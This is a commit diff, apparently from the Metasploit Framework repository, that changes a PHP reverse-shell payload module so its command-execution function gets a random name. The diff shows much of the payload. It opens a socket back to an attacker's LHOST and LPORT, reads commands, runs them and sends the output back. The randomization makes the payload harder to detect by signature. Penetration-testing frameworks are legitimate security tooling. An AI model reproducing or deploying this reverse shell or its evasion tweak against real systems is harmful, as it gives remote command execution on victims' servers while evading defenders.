actually randomize myexec function name
git-svn-id: file:///home/svn/framework3/trunk@5744 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
770ed0286c
commit
38b565399e
|
@ -62,15 +62,15 @@ module Metasploit3
|
|||
ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first
|
||||
port = datastore['LPORT']
|
||||
end
|
||||
exec_funcname = Rex::Text.rand_text_alpha(5)
|
||||
exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
|
||||
|
||||
shell=<<-END_OF_PHP_CODE
|
||||
$ipaddr=long2ip(#{ipaddr});
|
||||
$port=#{port};
|
||||
#{php_preamble({:disabled_varname => "$dis"})}
|
||||
|
||||
if(!function_exists('myexec')){
|
||||
function myexec($c){
|
||||
if(!function_exists('#{exec_funcname}')){
|
||||
function #{exec_funcname}($c){
|
||||
global$dis;
|
||||
#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
|
||||
return$o;
|
||||
|
@ -80,7 +80,7 @@ module Metasploit3
|
|||
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
|
||||
$s=@fsockopen($ipaddr,$port);
|
||||
while($c=fread($s,2048)){
|
||||
$out=myexec(substr($c,0,-1));
|
||||
$out=#{exec_funcname}(substr($c,0,-1));
|
||||
if($out===false){
|
||||
fwrite($s,$nofuncs);
|
||||
break;
|
||||
|
@ -93,7 +93,7 @@ module Metasploit3
|
|||
@socket_connect($s,$ipaddr,$port);
|
||||
@socket_write($s,"socket_create");
|
||||
while($c=@socket_read($s,2048)){
|
||||
$out=myexec(substr($c,0,-1));
|
||||
$out=#{exec_funcname}(substr($c,0,-1));
|
||||
if($out===false){
|
||||
@socket_write($s,$nofuncs);
|
||||
break;
|
||||
|
|
Loading…
Reference in New Issue